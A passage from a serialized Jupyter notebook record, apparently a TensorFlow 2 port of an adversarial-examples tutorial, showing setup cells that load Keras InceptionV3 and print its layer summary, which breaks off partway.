[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e730b5e82f15793b36ba19465f94fe3f9721e358
431,265
ipynb
Jupyter Notebook
anish_athalye/adversarial-examples/adversarial_tf2_v1.ipynb
phunc20/individuals
d5233ead8de726bbff2ae67d7622405caefad1ac
[ "MIT" ]
null
null
null
anish_athalye/adversarial-examples/adversarial_tf2_v1.ipynb
phunc20/individuals
d5233ead8de726bbff2ae67d7622405caefad1ac
[ "MIT" ]
null
null
null
anish_athalye/adversarial-examples/adversarial_tf2_v1.ipynb
phunc20/individuals
d5233ead8de726bbff2ae67d7622405caefad1ac
[ "MIT" ]
null
null
null
140.021104
250,660
0.81733
[ [ [ "# Setup\nBecause we switch to `tf2`, instead of using `tf.slim`, we will just use `tf.keras` for the inception model weights.", "_____no_output_____" ] ], [ [ "import tensorflow as tf\ntf.__version__", "_____no_output_____" ], [ "import tensorflow.keras as keras\nkeras.__version__", "_____no_output_____" ], [ "inception_model = keras.applications.inception_v3.InceptionV3()", "_____no_output_____" ], [ "inception_model.summary()", "Model: \"inception_v3\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_1 (InputLayer) [(None, 299, 299, 3) 0 \n__________________________________________________________________________________________________\nconv2d (Conv2D) (None, 149, 149, 32) 864 input_1[0][0] \n__________________________________________________________________________________________________\nbatch_normalization (BatchNorma (None, 149, 149, 32) 96 conv2d[0][0] \n__________________________________________________________________________________________________\nactivation (Activation) (None, 149, 149, 32) 0 batch_normalization[0][0] \n__________________________________________________________________________________________________\nconv2d_1 (Conv2D) (None, 147, 147, 32) 9216 activation[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_1 (BatchNor (None, 147, 147, 32) 96 conv2d_1[0][0] \n__________________________________________________________________________________________________\nactivation_1 (Activation) (None, 147, 147, 32) 0 batch_normalization_1[0][0] \n__________________________________________________________________________________________________\nconv2d_2 (Conv2D) (None, 147, 147, 64) 18432 activation_1[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_2 (BatchNor (None, 147, 147, 64) 192 conv2d_2[0][0] \n__________________________________________________________________________________________________\nactivation_2 (Activation) (None, 147, 147, 64) 0 batch_normalization_2[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d (MaxPooling2D) (None, 73, 73, 64) 0 activation_2[0][0] \n__________________________________________________________________________________________________\nconv2d_3 (Conv2D) (None, 73, 73, 80) 5120 max_pooling2d[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_3 (BatchNor (None, 73, 73, 80) 240 conv2d_3[0][0] \n__________________________________________________________________________________________________\nactivation_3 (Activation) (None, 73, 73, 80) 0 batch_normalization_3[0][0] \n__________________________________________________________________________________________________\nconv2d_4 (Conv2D) (None, 71, 71, 192) 138240 activation_3[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_4 (BatchNor (None, 71, 71, 192) 576 conv2d_4[0][0] \n__________________________________________________________________________________________________\nactivation_4 (Activation) (None, 71, 71, 192) 0 batch_normalization_4[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_1 (MaxPooling2D) (None, 35, 35, 192) 0 activation_4[0][0] \n__________________________________________________________________________________________________\nconv2d_8 (Conv2D) (None, 35, 35, 64) 12288 max_pooling2d_1[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_8 (BatchNor (None, 35, 35, 64) 192 conv2d_8[0][0] \n__________________________________________________________________________________________________\nactivation_8 (Activation) (None, 35, 35, 64) 0 batch_normalization_8[0][0] \n__________________________________________________________________________________________________\nconv2d_6 (Conv2D) (None, 35, 35, 48) 9216 max_pooling2d_1[0][0] \n__________________________________________________________________________________________________\nconv2d_9 (Conv2D) (None, 35, 35, 96) 55296 activation_8[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_6 (BatchNor (None, 35, 35, 48) 144 conv2d_6[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_9 (BatchNor (None, 35, 35, 96) 288 conv2d_9[0][0] \n__________________________________________________________________________________________________\nactivation_6 (Activation) (None, 35, 35, 48) 0 batch_normalization_6[0][0] \n__________________________________________________________________________________________________\nactivation_9 (Activation) (None, 35, 35, 96) 0 batch_normalization_9[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d (AveragePooli (None, 35, 35, 192) 0 max_pooling2d_1[0][0] \n__________________________________________________________________________________________________\nconv2d_5 (Conv2D) (None, 35, 35, 64) 12288 max_pooling2d_1[0][0] \n__________________________________________________________________________________________________\nconv2d_7 (Conv2D) (None, 35, 35, 64) 76800 activation_6[0][0] \n__________________________________________________________________________________________________\nconv2d_10 (Conv2D) (None, 35, 35, 96) 82944 activation_9[0][0] \n__________________________________________________________________________________________________\nconv2d_11 (Conv2D) (None, 35, 35, 32) 6144 average_pooling2d[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_5 (BatchNor (None, 35, 35, 64) 192 conv2d_5[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_7 (BatchNor (None, 35, 35, 64) 192 conv2d_7[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_10 (BatchNo (None, 35, 35, 96) 288 conv2d_10[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_11 (BatchNo (None, 35, 35, 32) 96 conv2d_11[0][0] \n__________________________________________________________________________________________________\nactivation_5 (Activation) (None, 35, 35, 64) 0 batch_normalization_5[0][0] \n__________________________________________________________________________________________________\nactivation_7 (Activation) (None, 35, 35, 64) 0 batch_normalization_7[0][0] \n__________________________________________________________________________________________________\nactivation_10 (Activation) (None, 35, 35, 96) 0 batch_normalization_10[0][0] \n__________________________________________________________________________________________________\nactivation_11 (Activation) (None, 35, 35, 32) 0 batch_normalization_11[0][0] \n__________________________________________________________________________________________________\nmixed0 (Concatenate) (None, 35, 35, 256) 0 activation_5[0][0] \n activation_7[0][0] \n activation_10[0][0] \n activation_11[0][0] \n__________________________________________________________________________________________________\nconv2d_15 (Conv2D) (None, 35, 35, 64) 16384 mixed0[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_15 (BatchNo (None, 35, 35, 64) 192 conv2d_15[0][0] \n__________________________________________________________________________________________________\nactivation_15 (Activation) (None, 35, 35, 64) 0 batch_normalization_15[0][0] \n__________________________________________________________________________________________________\nconv2d_13 (Conv2D) (None, 35, 35, 48) 12288 mixed0[0][0] \n__________________________________________________________________________________________________\nconv2d_16 (Conv2D) (None, 35, 35, 96) 55296 activation_15[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_13 (BatchNo (None, 35, 35, 48) 144 conv2d_13[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_16 (BatchNo (None, 35, 35, 96) 288 conv2d_16[0][0] \n__________________________________________________________________________________________________\nactivation_13 (Activation) (None, 35, 35, 48) 0 batch_normalization_13[0][0] \n__________________________________________________________________________________________________\nactivation_16 (Activation) (None, 35, 35, 96) 0 batch_normalization_16[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_1 (AveragePoo (None, 35, 35, 256) 0 mixed0[0][0] \n__________________________________________________________________________________________________\nconv2d_12 (Conv2D) (None, 35, 35, 64) 16384 mixed0[0][0] \n__________________________________________________________________________________________________\nconv2d_14 (Conv2D) (None, 35, 35, 64) 76800 activation_13[0][0] \n__________________________________________________________________________________________________\nconv2d_17 (Conv2D) (None, 35, 35, 96) 82944 activation_16[0][0] \n__________________________________________________________________________________________________\nconv2d_18 (Conv2D) (None, 35, 35, 64) 16384 average_pooling2d_1[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_12 (BatchNo (None, 35, 35, 64) 192 conv2d_12[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_14 (BatchNo (None, 35, 35, 64) 192 conv2d_14[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_17 (BatchNo (None, 35, 35, 96) 288 conv2d_17[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_18 (BatchNo (None, 35, 35, 64) 192 conv2d_18[0][0] \n__________________________________________________________________________________________________\nactivation_12 (Activation) (None, 35, 35, 64) 0 batch_normalization_12[0][0] \n__________________________________________________________________________________________________\nactivation_14 (Activation) (None, 35, 35, 64) 0 batch_normalization_14[0][0] \n__________________________________________________________________________________________________\nactivation_17 (Activation) (None, 35, 35, 96) 0 batch_normalization_17[0][0] \n__________________________________________________________________________________________________\nactivation_18 (Activation) (None, 35, 35, 64) 0 batch_normalization_18[0][0] \n__________________________________________________________________________________________________\nmixed1 (Concatenate) (None, 35, 35, 288) 0 activation_12[0][0] \n activation_14[0][0] \n activation_17[0][0] \n activation_18[0][0] \n__________________________________________________________________________________________________\nconv2d_22 (Conv2D) (None, 35, 35, 64) 18432 mixed1[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_22 (BatchNo (None, 35, 35, 64) 192 conv2d_22[0][0] \n__________________________________________________________________________________________________\nactivation_22 (Activation) (None, 35, 35, 64) 0 batch_normalization_22[0][0] \n__________________________________________________________________________________________________\nconv2d_20 (Conv2D) (None, 35, 35, 48) 13824 mixed1[0][0] \n__________________________________________________________________________________________________\nconv2d_23 (Conv2D) (None, 35, 35, 96) 55296 activation_22[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_20 (BatchNo (None, 35, 35, 48) 144 conv2d_20[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_23 (BatchNo (None, 35, 35, 96) 288 conv2d_23[0][0] \n__________________________________________________________________________________________________\nactivation_20 (Activation) (None, 35, 35, 48) 0 batch_normalization_20[0][0] \n__________________________________________________________________________________________________\nactivation_23 (Activation) (None, 35, 35, 96) 0 batch_normalization_23[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_2 (AveragePoo (None, 35, 35, 288) 0 mixed1[0][0] \n__________________________________________________________________________________________________\nconv2d_19 (Conv2D) (None, 35, 35, 64) 18432 mixed1[0][0] \n__________________________________________________________________________________________________\nconv2d_21 (Conv2D) (None, 35, 35, 64) 76800 activation_20[0][0] \n__________________________________________________________________________________________________\nconv2d_24 (Conv2D) (None, 35, 35, 96) 82944 activation_23[0][0] \n__________________________________________________________________________________________________\nconv2d_25 (Conv2D) (None, 35, 35, 64) 18432 average_pooling2d_2[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_19 (BatchNo (None, 35, 35, 64) 192 conv2d_19[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_21 (BatchNo (None, 35, 35, 64) 192 conv2d_21[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_24 (BatchNo (None, 35, 35, 96) 288 conv2d_24[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_25 (BatchNo (None, 35, 35, 64) 192 conv2d_25[0][0] \n__________________________________________________________________________________________________\nactivation_19 (Activation) (None, 35, 35, 64) 0 batch_normalization_19[0][0] \n__________________________________________________________________________________________________\nactivation_21 (Activation) (None, 35, 35, 64) 0 batch_normalization_21[0][0] \n__________________________________________________________________________________________________\nactivation_24 (Activation) (None, 35, 35, 96) 0 batch_normalization_24[0][0] \n__________________________________________________________________________________________________\nactivation_25 (Activation) (None, 35, 35, 64) 0 batch_normalization_25[0][0] \n__________________________________________________________________________________________________\nmixed2 (Concatenate) (None, 35, 35, 288) 0 activation_19[0][0] \n activation_21[0][0] \n activation_24[0][0] \n activation_25[0][0] \n__________________________________________________________________________________________________\nconv2d_27 (Conv2D) (None, 35, 35, 64) 18432 mixed2[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_27 (BatchNo (None, 35, 35, 64) 192 conv2d_27[0][0] \n__________________________________________________________________________________________________\nactivation_27 (Activation) (None, 35, 35, 64) 0 batch_normalization_27[0][0] \n__________________________________________________________________________________________________\nconv2d_28 (Conv2D) (None, 35, 35, 96) 55296 activation_27[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_28 (BatchNo (None, 35, 35, 96) 288 conv2d_28[0][0] \n__________________________________________________________________________________________________\nactivation_28 (Activation) (None, 35, 35, 96) 0 batch_normalization_28[0][0] \n__________________________________________________________________________________________________\nconv2d_26 (Conv2D) (None, 17, 17, 384) 995328 mixed2[0][0] \n__________________________________________________________________________________________________\nconv2d_29 (Conv2D) (None, 17, 17, 96) 82944 activation_28[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_26 (BatchNo (None, 17, 17, 384) 1152 conv2d_26[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_29 (BatchNo (None, 17, 17, 96) 288 conv2d_29[0][0] \n__________________________________________________________________________________________________\nactivation_26 (Activation) (None, 17, 17, 384) 0 batch_normalization_26[0][0] \n__________________________________________________________________________________________________\nactivation_29 (Activation) (None, 17, 17, 96) 0 batch_normalization_29[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_2 (MaxPooling2D) (None, 17, 17, 288) 0 mixed2[0][0] \n__________________________________________________________________________________________________\nmixed3 (Concatenate) (None, 17, 17, 768) 0 activation_26[0][0] \n activation_29[0][0] \n max_pooling2d_2[0][0] \n__________________________________________________________________________________________________\nconv2d_34 (Conv2D) (None, 17, 17, 128) 98304 mixed3[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_34 (BatchNo (None, 17, 17, 128) 384 conv2d_34[0][0] \n__________________________________________________________________________________________________\nactivation_34 (Activation) (None, 17, 17, 128) 0 batch_normalization_34[0][0] \n__________________________________________________________________________________________________\nconv2d_35 (Conv2D) (None, 17, 17, 128) 114688 activation_34[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_35 (BatchNo (None, 17, 17, 128) 384 conv2d_35[0][0] \n__________________________________________________________________________________________________\nactivation_35 (Activation) (None, 17, 17, 128) 0 batch_normalization_35[0][0] \n__________________________________________________________________________________________________\nconv2d_31 (Conv2D) (None, 17, 17, 128) 98304 mixed3[0][0] \n__________________________________________________________________________________________________\nconv2d_36 (Conv2D) (None, 17, 17, 128) 114688 activation_35[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_31 (BatchNo (None, 17, 17, 128) 384 conv2d_31[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_36 (BatchNo (None, 17, 17, 128) 384 conv2d_36[0][0] \n__________________________________________________________________________________________________\nactivation_31 (Activation) (None, 17, 17, 128) 0 batch_normalization_31[0][0] \n__________________________________________________________________________________________________\nactivation_36 (Activation) (None, 17, 17, 128) 0 batch_normalization_36[0][0] \n__________________________________________________________________________________________________\nconv2d_32 (Conv2D) (None, 17, 17, 128) 114688 activation_31[0][0] \n__________________________________________________________________________________________________\nconv2d_37 (Conv2D) (None, 17, 17, 128) 114688 activation_36[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_32 (BatchNo (None, 17, 17, 128) 384 conv2d_32[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_37 (BatchNo (None, 17, 17, 128) 384 conv2d_37[0][0] \n__________________________________________________________________________________________________\nactivation_32 (Activation) (None, 17, 17, 128) 0 batch_normalization_32[0][0] \n__________________________________________________________________________________________________\nactivation_37 (Activation) (None, 17, 17, 128) 0 batch_normalization_37[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_3 (AveragePoo (None, 17, 17, 768) 0 mixed3[0][0] \n__________________________________________________________________________________________________\nconv2d_30 (Conv2D) (None, 17, 17, 192) 147456 mixed3[0][0] \n__________________________________________________________________________________________________\nconv2d_33 (Conv2D) (None, 17, 17, 192) 172032 activation_32[0][0] \n__________________________________________________________________________________________________\nconv2d_38 (Conv2D) (None, 17, 17, 192) 172032 activation_37[0][0] \n__________________________________________________________________________________________________\nconv2d_39 (Conv2D) (None, 17, 17, 192) 147456 average_pooling2d_3[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_30 (BatchNo (None, 17, 17, 192) 576 conv2d_30[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_33 (BatchNo (None, 17, 17, 192) 576 conv2d_33[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_38 (BatchNo (None, 17, 17, 192) 576 conv2d_38[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_39 (BatchNo (None, 17, 17, 192) 576 conv2d_39[0][0] \n__________________________________________________________________________________________________\nactivation_30 (Activation) (None, 17, 17, 192) 0 batch_normalization_30[0][0] \n__________________________________________________________________________________________________\nactivation_33 (Activation) (None, 17, 17, 192) 0 batch_normalization_33[0][0] \n__________________________________________________________________________________________________\nactivation_38 (Activation) (None, 17, 17, 192) 0 batch_normalization_38[0][0] \n__________________________________________________________________________________________________\nactivation_39 (Activation) (None, 17, 17, 192) 0 batch_normalization_39[0][0] \n__________________________________________________________________________________________________\nmixed4 (Concatenate) (None, 17, 17, 768) 0 activation_30[0][0] \n activation_33[0][0] \n activation_38[0][0] \n activation_39[0][0] \n__________________________________________________________________________________________________\nconv2d_44 (Conv2D) (None, 17, 17, 160) 122880 mixed4[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_44 (BatchNo (None, 17, 17, 160) 480 conv2d_44[0][0] \n__________________________________________________________________________________________________\nactivation_44 (Activation) (None, 17, 17, 160) 0 batch_normalization_44[0][0] \n__________________________________________________________________________________________________\nconv2d_45 (Conv2D) (None, 17, 17, 160) 179200 activation_44[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_45 (BatchNo (None, 17, 17, 160) 480 conv2d_45[0][0] \n__________________________________________________________________________________________________\nactivation_45 (Activation) (None, 17, 17, 160) 0 batch_normalization_45[0][0] \n__________________________________________________________________________________________________\nconv2d_41 (Conv2D) (None, 17, 17, 160) 122880 mixed4[0][0] \n__________________________________________________________________________________________________\nconv2d_46 (Conv2D) (None, 17, 17, 160) 179200 activation_45[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_41 (BatchNo (None, 17, 17, 160) 480 conv2d_41[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_46 (BatchNo (None, 17, 17, 160) 480 conv2d_46[0][0] \n__________________________________________________________________________________________________\nactivation_41 (Activation) (None, 17, 17, 160) 0 batch_normalization_41[0][0] \n__________________________________________________________________________________________________\nactivation_46 (Activation) (None, 17, 17, 160) 0 batch_normalization_46[0][0] \n__________________________________________________________________________________________________\nconv2d_42 (Conv2D) (None, 17, 17, 160) 179200 activation_41[0][0] \n__________________________________________________________________________________________________\nconv2d_47 (Conv2D) (None, 17, 17, 160) 179200 activation_46[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_42 (BatchNo (None, 17, 17, 160) 480 conv2d_42[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_47 (BatchNo (None, 17, 17, 160) 480 conv2d_47[0][0] \n__________________________________________________________________________________________________\nactivation_42 (Activation) (None, 17, 17, 160) 0 batch_normalization_42[0][0] \n__________________________________________________________________________________________________\nactivation_47 (Activation) (None, 17, 17, 160) 0 batch_normalization_47[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_4 (AveragePoo (None, 17, 17, 768) 0 mixed4[0][0] \n__________________________________________________________________________________________________\nconv2d_40 (Conv2D) (None, 17, 17, 192) 147456 mixed4[0][0] \n__________________________________________________________________________________________________\nconv2d_43 (Conv2D) (None, 17, 17, 192) 215040 activation_42[0][0] \n__________________________________________________________________________________________________\nconv2d_48 (Conv2D) (None, 17, 17, 192) 215040 activation_47[0][0] \n__________________________________________________________________________________________________\nconv2d_49 (Conv2D) (None, 17, 17, 192) 147456 average_pooling2d_4[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_40 (BatchNo (None, 17, 17, 192) 576 conv2d_40[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_43 (BatchNo (None, 17, 17, 192) 576 conv2d_43[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_48 (BatchNo (None, 17, 17, 192) 576 conv2d_48[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_49 (BatchNo (None, 17, 17, 192) 576 conv2d_49[0][0] \n__________________________________________________________________________________________________\nactivation_40 (Activation) (None, 17, 17, 192) 0 batch_normalization_40[0][0] \n__________________________________________________________________________________________________\nactivation_43 (Activation) (None, 17, 17, 192) 0 batch_normalization_43[0][0] \n__________________________________________________________________________________________________\nactivation_48 (Activation) (None, 17, 17, 192) 0 batch_normalization_48[0][0] \n__________________________________________________________________________________________________\nactivation_49 (Activation) (None, 17, 17, 192) 0 batch_normalization_49[0][0] \n__________________________________________________________________________________________________\nmixed5 (Concatenate) (None, 17, 17, 768) 0 activation_40[0][0] \n activation_43[0][0] \n activation_48[0][0] \n activation_49[0][0] \n__________________________________________________________________________________________________\nconv2d_54 (Conv2D) (None, 17, 17, 160) 122880 mixed5[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_54 (BatchNo (None, 17, 17, 160) 480 conv2d_54[0][0] \n__________________________________________________________________________________________________\nactivation_54 (Activation) (None, 17, 17, 160) 0 batch_normalization_54[0][0] \n__________________________________________________________________________________________________\nconv2d_55 (Conv2D) (None, 17, 17, 160) 179200 activation_54[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_55 (BatchNo (None, 17, 17, 160) 480 conv2d_55[0][0] \n__________________________________________________________________________________________________\nactivation_55 (Activation) (None, 17, 17, 160) 0 batch_normalization_55[0][0] \n__________________________________________________________________________________________________\nconv2d_51 (Conv2D) (None, 17, 17, 160) 122880 mixed5[0][0] \n__________________________________________________________________________________________________\nconv2d_56 (Conv2D) (None, 17, 17, 160) 179200 activation_55[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_51 (BatchNo (None, 17, 17, 160) 480 conv2d_51[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_56 (BatchNo (None, 17, 17, 160) 480 conv2d_56[0][0] \n__________________________________________________________________________________________________\nactivation_51 (Activation) (None, 17, 17, 160) 0 batch_normalization_51[0][0] \n__________________________________________________________________________________________________\nactivation_56 (Activation) (None, 17, 17, 160) 0 batch_normalization_56[0][0] \n__________________________________________________________________________________________________\nconv2d_52 (Conv2D) (None, 17, 17, 160) 179200 activation_51[0][0] \n__________________________________________________________________________________________________\nconv2d_57 (Conv2D) (None, 17, 17, 160) 179200 activation_56[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_52 (BatchNo (None, 17, 17, 160) 480 conv2d_52[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_57 (BatchNo (None, 17, 17, 160) 480 conv2d_57[0][0] \n__________________________________________________________________________________________________\nactivation_52 (Activation) (None, 17, 17, 160) 0 batch_normalization_52[0][0] \n__________________________________________________________________________________________________\nactivation_57 (Activation) (None, 17, 17, 160) 0 batch_normalization_57[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_5 (AveragePoo (None, 17, 17, 768) 0 mixed5[0][0] \n__________________________________________________________________________________________________\nconv2d_50 (Conv2D) (None, 17, 17, 192) 147456 mixed5[0][0] \n__________________________________________________________________________________________________\nconv2d_53 (Conv2D) (None, 17, 17, 192) 215040 activation_52[0][0] \n__________________________________________________________________________________________________\nconv2d_58 (Conv2D) (None, 17, 17, 192) 215040 activation_57[0][0] \n__________________________________________________________________________________________________\nconv2d_59 (Conv2D) (None, 17, 17, 192) 147456 average_pooling2d_5[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_50 (BatchNo (None, 17, 17, 192) 576 conv2d_50[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_53 (BatchNo (None, 17, 17, 192) 576 conv2d_53[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_58 (BatchNo (None, 17, 17, 192) 576 conv2d_58[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_59 (BatchNo (None, 17, 17, 192) 576 conv2d_59[0][0] \n__________________________________________________________________________________________________\nactivation_50 (Activation) (None, 17, 17, 192) 0 batch_normalization_50[0][0] \n__________________________________________________________________________________________________\nactivation_53 (Activation) (None, 17, 17, 192) 0 batch_normalization_53[0][0] \n__________________________________________________________________________________________________\nactivation_58 (Activation) (None, 17, 17, 192) 0 batch_normalization_58[0][0] \n__________________________________________________________________________________________________\nactivation_59 (Activation) (None, 17, 17, 192) 0 batch_normalization_59[0][0] \n__________________________________________________________________________________________________\nmixed6 (Concatenate) (None, 17, 17, 768) 0 activation_50[0][0] \n activation_53[0][0] \n activation_58[0][0] \n activation_59[0][0] \n__________________________________________________________________________________________________\nconv2d_64 (Conv2D) (None, 17, 17, 192) 147456 mixed6[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_64 (BatchNo (None, 17, 17, 192) 576 conv2d_64[0][0] \n__________________________________________________________________________________________________\nactivation_64 (Activation) (None, 17, 17, 192) 0 batch_normalization_64[0][0] \n__________________________________________________________________________________________________\nconv2d_65 (Conv2D) (None, 17, 17, 192) 258048 activation_64[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_65 (BatchNo (None, 17, 17, 192) 576 conv2d_65[0][0] \n__________________________________________________________________________________________________\nactivation_65 (Activation) (None, 17, 17, 192) 0 batch_normalization_65[0][0] \n__________________________________________________________________________________________________\nconv2d_61 (Conv2D) (None, 17, 17, 192) 147456 mixed6[0][0] \n__________________________________________________________________________________________________\nconv2d_66 (Conv2D) (None, 17, 17, 192) 258048 activation_65[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_61 (BatchNo (None, 17, 17, 192) 576 conv2d_61[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_66 (BatchNo (None, 17, 17, 192) 576 conv2d_66[0][0] \n__________________________________________________________________________________________________\nactivation_61 (Activation) (None, 17, 17, 192) 0 batch_normalization_61[0][0] \n__________________________________________________________________________________________________\nactivation_66 (Activation) (None, 17, 17, 192) 0 batch_normalization_66[0][0] \n__________________________________________________________________________________________________\nconv2d_62 (Conv2D) (None, 17, 17, 192) 258048 activation_61[0][0] \n__________________________________________________________________________________________________\nconv2d_67 (Conv2D) (None, 17, 17, 192) 258048 activation_66[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_62 (BatchNo (None, 17, 17, 192) 576 conv2d_62[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_67 (BatchNo (None, 17, 17, 192) 576 conv2d_67[0][0] \n__________________________________________________________________________________________________\nactivation_62 (Activation) (None, 17, 17, 192) 0 batch_normalization_62[0][0] \n__________________________________________________________________________________________________\nactivation_67 (Activation) (None, 17, 17, 192) 0 batch_normalization_67[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_6 (AveragePoo (None, 17, 17, 768) 0 mixed6[0][0] \n__________________________________________________________________________________________________\nconv2d_60 (Conv2D) (None, 17, 17, 192) 147456 mixed6[0][0] \n__________________________________________________________________________________________________\nconv2d_63 (Conv2D) (None, 17, 17, 192) 258048 activation_62[0][0] \n__________________________________________________________________________________________________\nconv2d_68 (Conv2D) (None, 17, 17, 192) 258048 activation_67[0][0] \n__________________________________________________________________________________________________\nconv2d_69 (Conv2D) (None, 17, 17, 192) 147456 average_pooling2d_6[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_60 (BatchNo (None, 17, 17, 192) 576 conv2d_60[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_63 (BatchNo (None, 17, 17, 192) 576 conv2d_63[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_68 (BatchNo (None, 17, 17, 192) 576 conv2d_68[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_69 (BatchNo (None, 17, 17, 192) 576 conv2d_69[0][0] \n__________________________________________________________________________________________________\nactivation_60 (Activation) (None, 17, 17, 192) 0 batch_normalization_60[0][0] \n__________________________________________________________________________________________________\nactivation_63 (Activation) (None, 17, 17, 192) 0 batch_normalization_63[0][0] \n__________________________________________________________________________________________________\nactivation_68 (Activation) (None, 17, 17, 192) 0 batch_normalization_68[0][0] \n__________________________________________________________________________________________________\nactivation_69 (Activation) (None, 17, 17, 192) 0 batch_normalization_69[0][0] \n__________________________________________________________________________________________________\nmixed7 (Concatenate) (None, 17, 17, 768) 0 activation_60[0][0] \n activation_63[0][0] \n activation_68[0][0] \n activation_69[0][0] \n__________________________________________________________________________________________________\nconv2d_72 (Conv2D) (None, 17, 17, 192) 147456 mixed7[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_72 (BatchNo (None, 17, 17, 192) 576 conv2d_72[0][0] \n__________________________________________________________________________________________________\nactivation_72 (Activation) (None, 17, 17, 192) 0 batch_normalization_72[0][0] \n__________________________________________________________________________________________________\nconv2d_73 (Conv2D) (None, 17, 17, 192) 258048 activation_72[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_73 (BatchNo (None, 17, 17, 192) 576 conv2d_73[0][0] \n__________________________________________________________________________________________________\nactivation_73 (Activation) (None, 17, 17, 192) 0 batch_normalization_73[0][0] \n__________________________________________________________________________________________________\nconv2d_70 (Conv2D) (None, 17, 17, 192) 147456 mixed7[0][0] \n__________________________________________________________________________________________________\nconv2d_74 (Conv2D) (None, 17, 17, 192) 258048 activation_73[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_70 (BatchNo (None, 17, 17, 192) 576 conv2d_70[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_74 (BatchNo (None, 17, 17, 192) 576 conv2d_74[0][0] \n__________________________________________________________________________________________________\nactivation_70 (Activation) (None, 17, 17, 192) 0 batch_normalization_70[0][0] \n__________________________________________________________________________________________________\nactivation_74 (Activation) (None, 17, 17, 192) 0 batch_normalization_74[0][0] \n__________________________________________________________________________________________________\nconv2d_71 (Conv2D) (None, 8, 8, 320) 552960 